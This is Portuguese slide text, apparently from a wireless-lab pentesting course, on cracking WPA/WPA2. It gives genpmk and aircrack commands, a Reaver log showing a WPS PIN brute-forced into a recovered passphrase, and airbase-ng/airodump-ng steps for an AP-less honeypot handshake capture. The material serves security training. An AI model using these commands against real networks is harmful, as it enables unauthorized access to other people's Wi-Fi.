A fraqueza baseada na frase escolhida Mais nada a ser dito !!!!! Procedimento igual ao anterior
Acelerando o processo de Cracking
Ns podemos pr-calcular a PMK para um dado SSID e uma wordlist usando a ferramenta genpmk genpmk -f /pentest/passwords/wordlists/darkc0de. lst -d PMK-Wireless-Lab -s "Wireless Lab Vamos criar uma rede WPA-PSK com a senha skysign e capture o WPA-handshake desta rede
Acelerando o processo de Cracking
Mea o tempo levado com aircrack
e compare
Usando PMK com aircrack
Pyrit para sistemas MultiCPU
Como o Reaver funciona?
Explora a vulnerabilidade no WPS Wi-Fi Protected Setup (WPS)
Fora bruta em PINs para relevar as senhas do WPA ou WPA2 Leva de 4 a 10 horas No funciona em todos os APs
[+] Waiting for beacon from 34:08:04:C0:B6:4E [+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2) [+] Trying pin 22838353 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received M5 message [+] Sending M6 message [+] Received M7 message [+] Sending WSC NACK [+] Sending WSC NACK [+] Pin cracked in 3 seconds [+] WPS PIN: '22838353' [+] WPA PSK: 'DECADA1234' [+] AP SSID: 'multipinguim-2' [+] Nothing done, nothing to save.
Conectando a uma rede WPA
wpa-supp.conf
Conectando a uma rede WPA
Cracking AP-less WPA Personal
Para fazermos um crack no WPA precisamos do 4 handshake:
Authenticator Nounce, Supplicante Nounce, Authenticator MAC, Supplicant MAC. S que para este ataque no precisamos de todos estes pacotes: Ou pacote 1 & 2 ou pacotes 2 & 3
Para crackear precisamos ento do WPA-PSK honeypot para ento
ele conectar-se, somente precisamos da msg 1 e msg 2. No precisamos saber nenhuma frase secreta ;-)
Cracking AP-less WPA Personal
1) Configurando nosso honeypot airbase-ng -c 3 -a <AP> -e Wireless Lab -W 1 -z 2 mon0 2) Iniciamos o airodump airodumo-ng -c 3 bssid <AP> --write sem-AP-WPA-cracking mon0 3) Volte a tela do airbase e observe os clientes se associando 4) Volte a tela do airodump e veja se pegou o WPA Handshake 5) Rode o aircrack agora aircrack-ng -w wordlist.txt -b <AP> sem-AP-WPA-cracking-01.cap